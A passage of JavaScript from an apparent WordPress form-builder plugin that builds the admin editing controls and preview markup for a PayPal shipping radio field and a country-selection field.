                el_randomize.setAttribute("onclick", "set_randomize('"+i+"_randomizeform_id_temp')");
	if(w_randomize=="yes")
			    el_randomize.setAttribute("checked", "checked");

	var el_allow_other_label = document.createElement('label');
				el_allow_other_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_allow_other_label.innerHTML = "Allow other";
	
	var el_allow_other = document.createElement('input');
                el_allow_other.setAttribute("id", "el_allow_other");
                el_allow_other.setAttribute("type", "checkbox");
                el_allow_other.setAttribute("value", "yes");
                el_allow_other.setAttribute("onclick", "set_allow_other('"+i+"','radio')");
	if(w_allow_other=="yes")
			    el_allow_other.setAttribute("checked", "checked");

	var el_product_option_label = document.createElement('label');
	    el_product_option_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;";
		el_product_option_label.innerHTML = "Product properties";
	
	var el_product_option_add_a = document.createElement('a');
		// el_product_option_add_a.setAttribute("rel", "{handler: 'iframe', size: {x: 650, y: 375}}"	);
		// el_product_option_add_a.setAttribute("href","index.php?option=com_formmaker&task=product_option_fmc&field_id="+i+"&tmpl=component");
		// el_product_option_add_a.setAttribute("class","modal");
    el_product_option_add_a.setAttribute("href", url_for_ajax + "?action=product_option_fmc&field_id=" + i + "&url_for_ajax=" + url_for_ajax + "&width=600&height=400&TB_iframe=1");
		el_product_option_add_a.setAttribute("class","thickbox-preview");

	var el_product_option_add_img = document.createElement('img');
		el_product_option_add_img.setAttribute("src", fmc_plugin_url+'/images/add.png');
		
	var el_product_option_add_ul = document.createElement('ul');
		el_product_option_add_ul.setAttribute("id", 'option_ul');
		el_product_option_add_ul.style.cssText="list-style-type: none; padding:0px"
				
				
	el_product_option_add_a.appendChild(el_product_option_add_img);
	

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_choices_label = document.createElement('label');
			        el_choices_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_choices_label.innerHTML = "Options ";

	
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           	el_choices_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_choise_price('radio',"+i+")");
				
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	

	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_label_flow);
	edit_main_td3_1.appendChild(el_flow_vertical);
	edit_main_td3_1.appendChild(Vertical);
	edit_main_td3_1.appendChild(br4);
	edit_main_td3_1.appendChild(el_flow_horizontal);
	edit_main_td3_1.appendChild(Horizontal);

	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_randomize_label);
	edit_main_td8_1.appendChild(el_randomize);
	
	edit_main_td9.appendChild(el_allow_other_label);
	edit_main_td9_1.appendChild(el_allow_other);
	
	edit_main_td10.appendChild(el_product_option_label);
	edit_main_td10.appendChild(el_product_option_add_ul);
	edit_main_td10_1.appendChild(el_product_option_add_a);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_td4.appendChild(el_choices_label);
	edit_main_td4_1.appendChild(el_choices_add);

			var div_ = document.createElement('div');
			div_.style.cssText = 'border-bottom:1px dotted black; width: 187px;';
		var br = document.createElement('br');
		
		var el_choices_mini_label = document.createElement('b');
			el_choices_mini_label.innerHTML="Shipping type";
			el_choices_mini_label.style.cssText='padding-right: 15px; padding-left: 15px; font-size:9px';
			
		var el_choices_price_mini_label = document.createElement('b');
			el_choices_price_mini_label.innerHTML="Price";
			el_choices_price_mini_label.style.cssText='padding-right: 15px; padding-left: 15px;  font-size:9px';
	
		var el_choices_remove_mini_label = document.createElement('b');
			el_choices_remove_mini_label.innerHTML="Empty value";
			el_choices_remove_mini_label.style.cssText='padding-right: 2px; padding-left: 2px; font-size:9px';
			
		var el_choices_dis_mini_label = document.createElement('b');
			el_choices_dis_mini_label.innerHTML="Delete";
			el_choices_dis_mini_label.style.cssText='padding-left: 2px; padding-right: 2px; font-size:9px';
			
		div_.appendChild(br);
		div_.appendChild(el_choices_mini_label);
		div_.appendChild(el_choices_price_mini_label);
		div_.appendChild(el_choices_dis_mini_label);
		edit_main_td4.appendChild(div_);


	n=w_choices.length;
	for(j=0; j<n; j++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "br"+j);
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+j);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_choices.setAttribute("onKeyUp", "change_label('"+i+"_label_element"+j+"', this.value); change_label_1('"+i+"_elementlabel_form_id_temp"+j+"', this.value); ");
	
		var el_choices_price = document.createElement('input');
			el_choices_price.setAttribute("id", "el_option_price"+j);
			el_choices_price.setAttribute("type", "text");
			el_choices_price.setAttribute("value", w_choices_price[j]);
			el_choices_price.style.cssText =   "width:50px; margin:1px; padding:0; border-width: 1px";
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_price.style.display = 'none';
			el_choices_price.setAttribute("onKeyUp", "change_value_price('"+i+"_elementform_id_temp"+j+"', this.value)");
			el_choices_price.setAttribute("onKeyPress", "return check_isnum_point(event)");

		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px; display:none';
		else			
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise_price("+j+","+i+")");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_choices);
		edit_main_td4.appendChild(el_choices_price);
		edit_main_td4.appendChild(el_choices_remove);
	
	}


	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr8.style.display="none";
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr9.style.display="none";
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr10.style.display="none";
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='input';	type='radio'; 
		var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_paypal_shipping");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
	    
	var adding_randomize = document.createElement("input");
            adding_randomize.setAttribute("type", "hidden");
            adding_randomize.setAttribute("value", w_randomize);
            adding_randomize.setAttribute("name", i+"_randomizeform_id_temp");			
            adding_randomize.setAttribute("id", i+"_randomizeform_id_temp");
	    
	var adding_allow_other= document.createElement("input");
            adding_allow_other.setAttribute("type", "hidden");
            adding_allow_other.setAttribute("value", w_allow_other);
            adding_allow_other.setAttribute("name", i+"_allow_otherform_id_temp");			
            adding_allow_other.setAttribute("id", i+"_allow_otherform_id_temp");
	    
     var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
	
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
//tbody sarqac		
		var table_little_t = document.createElement('table');
			
		var table_little = document.createElement('tbody');
           	table_little.setAttribute("id", i+"_table_little");
			
		table_little_t.appendChild(table_little);
	
      	var tr_little1 = document.createElement('tr');
	        tr_little1.setAttribute("id", i+"_element_tr1");
		
      	var tr_little2 = document.createElement('tr');
 	        tr_little2.setAttribute("id", i+"_element_tr2");
			
      	var td_little1 = document.createElement('td');
         	td_little1.setAttribute("valign", 'top');
           	td_little1.setAttribute("id", i+"_td_little1");
			
      	var td_little2 = document.createElement('td');
        	td_little2.setAttribute("valign", 'top');
           	td_little2.setAttribute("id", i+"_td_little2");
			

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	n=w_choices.length;
	aaa=false;
	for(j=0; j<n; j++)
	{      	
		var tr_little = document.createElement('tr');
			tr_little.setAttribute("id", i+"_element_tr"+j);
				
		var td_little = document.createElement('td');
			td_little.setAttribute("valign", 'top');
			td_little.setAttribute("id", i+"_td_little"+j);
			td_little.setAttribute("idi", j);
	
		var adding = document.createElement(element);
				adding.setAttribute("type", type);
				adding.setAttribute("id", i+"_elementform_id_temp"+j);
				adding.setAttribute("name", i+"_elementform_id_temp");
				adding.setAttribute("value", w_choices_price[j]);
			if(w_allow_other=="yes" && j==w_allow_other_num)
			{
				adding.setAttribute("other", "1");
				adding.setAttribute("onclick", "set_default('"+i+"','"+j+"','form_id_temp'); show_other_input('"+i+"','form_id_temp');");
			}
			else
				adding.setAttribute("onclick", "set_default('"+i+"','"+j+"','form_id_temp')");
			
		if(w_choices_checked[j]=='1')
		{
			adding.setAttribute("checked", "checked");
		}		
				
				
		var label_adding = document.createElement('label');
				label_adding.setAttribute("id", i+"_label_element"+j);
				label_adding.setAttribute("class","ch_rad_label");
				label_adding.setAttribute("for",i+"_elementform_id_temp"+j);
				label_adding.innerHTML = w_choices[j];
				
		var adding_ch_label = document.createElement('input');
				adding_ch_label.setAttribute("type", "hidden");
				adding_ch_label.setAttribute("id", i+"_elementlabel_form_id_temp"+j);
				adding_ch_label.setAttribute("name", i+"_elementform_id_temp"+j+"_label");
				adding_ch_label.setAttribute("value", w_choices[j]);
				
				
		td_little.appendChild(adding);
		td_little.appendChild(label_adding);
		td_little.appendChild(adding_ch_label);
		tr_little.appendChild(td_little);
		table_little.appendChild(tr_little);
			
		if(w_choices_checked[j]=='1')
			if(w_allow_other=="yes" && j==w_allow_other_num)
				aaa=true;
	}			
	
		var div_ = document.createElement('div');
			div_.setAttribute("id", i+"_divform_id_temp");
	    
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
       	td2.appendChild(adding_type);
	
       	td2.appendChild(adding_required);
       	td2.appendChild(adding_randomize);
       	td2.appendChild(adding_allow_other);
		td2.appendChild(table_little_t);
  		td2.appendChild(div_);
    	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	add_id_and_name(i, 'type_radio');

		if(w_field_label_pos=="top")
					label_top(i);
		
		if(w_flow=="hor")
				
				flow_hor(i);
/////////////////////////////////////////////////
// form_maker_open_in_popup(11);
change_class(w_class, i);
refresh_attr(i, 'type_checkbox');
if(aaa)
{
	show_other_input(i);
}

add_properties(i, w_property, w_property_values, w_property_type);
spider_popup();
}

function type_country(i, w_field_label, w_countries, w_field_label_pos, w_size, w_required, w_class, w_attr_name, w_attr_value) {

	document.getElementById("element_type").value="type_country";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
	


                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	
	var el_size_label = document.createElement('label');
	        el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		el_size.setAttribute("id", "edit_for_input_size");

		el_size.setAttribute("type", "text");
		el_size.setAttribute("value", w_size);
		
		el_size.setAttribute("name", "edit_for_size");
		el_size.setAttribute("onKeyPress", "return check_isnum(event)");
		el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");
		
	var el_edit_list = document.createElement('a');
	  el_edit_list.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px; font-style:italic; cursor:pointer";
		el_edit_list.innerHTML = "Edit country list";
		el_edit_list.setAttribute("href", url_for_ajax + "?action=fromeditcountryinpopup_fmc&field_id="+i+"&width=600&height=400&TB_iframe=1");
		el_edit_list.setAttribute("class","thickbox-preview");
		
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
		br3.setAttribute("id", "br1");
	var br4 = document.createElement('br');
		br4.setAttribute("id", "br2");
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_td7.appendChild(el_edit_list);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_country");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
		var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'middle');
         	td2.setAttribute("align", 'left');
